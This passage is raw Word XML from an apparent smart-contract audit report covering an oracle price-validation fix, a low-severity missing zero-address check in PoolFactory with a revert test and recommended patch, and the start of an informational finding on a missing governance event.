        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    assertEq(price, 2_000e8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698EBCB4" w14:textId="7F417809" w:rsidR="007B3A72" w:rsidRPr="00707638" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD13E93" w14:textId="07AA77A4" w:rsidR="00B832C7" w:rsidRPr="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F44F1E5" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Recommendation (implemented)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB84F0B" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>function _validate(int256 answer, uint256 updatedAt, uint80 answeredInRound) internal view {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD2EB7" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (answer &lt;= 0) revert InvalidPrice();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB5F488" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (updatedAt == 0 || answeredInRound == 0) revert IncompleteRound();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4572B4E9" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (maxStaleness != 0 &amp;&amp; block.timestamp - updatedAt &gt; maxStaleness) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C932EA0" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        revert StalePrice(updatedAt, maxStaleness);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1570A41E" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B43EB2F" w14:textId="1D54CD45" w:rsidR="00B832C7" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B995E5" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRPr="007B3A72" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76C73C30" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C284906" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD3CF7A" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>S-04 — Missing zero-address check in PoolFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CAC636" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> Low</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> contracts/amm/PoolFactory.sol — createPool, createPoolDeterministic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3822BF8A" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281AD446" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Factory forwarded tokenA / tokenB directly into AMMPool without explicit validation. AMMPool’s constructor reverts on zero address, but CREATE2 still consumes gas and produces confusing off-chain indexing failures when integrators pass malformed parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284E4252" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5302CD" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Wasted gas on failed deterministic deploys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549F6975" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Poor UX for subgraph/indexer consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D986E" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Potential address squatting confusion with predictDeterministicAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9DFF1" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A8DC4E" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714CC3B4" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C838DF2" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>function test_createPool_zero_address_reverts_at_pool() public {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE96330" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    vm.expectRevert();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F2652" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    factory.createPool(address(0), address(tokenB));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D18BA37" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE55282" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2879DC13" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15718000" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69086E43" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>error ZeroAddress();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037AE619" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD9F3D3" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>function createPool(address tokenA, address tokenB) external returns (address pool) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706B959B" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (tokenA == address(0) || tokenB == address(0)) revert ZeroAddress();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A573EBC" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    pool = address(new AMMPool(tokenA, tokenB, msg.sender));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300EB400" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t xml:space="preserve">    emit PoolCreated(pool, tokenA, tokenB, bytes32(0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2360FC28" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A6FA3" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7173D45D" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0701B58A" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>S-05 — Missing event after governance parameter change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0C327" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE2D5D6" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5702F929" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> Informational</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> contracts/upgradeable/UpgradeableProtocolConfig.sol — setFeeBps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281D6E0B" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C135A44" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>setFeeBps updated fee basis points without emitting an indexed event. Off-chain governance dashboards, subgraphs, and monitoring cannot reliably detect parameter changes without tracing internal transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A9401" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428CD822" w14:textId="77777777" w:rsidR="007B3A72" w:rsidRPr="007B3A72" w:rsidRDefault="007B3A72" w:rsidP="007B3A72">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
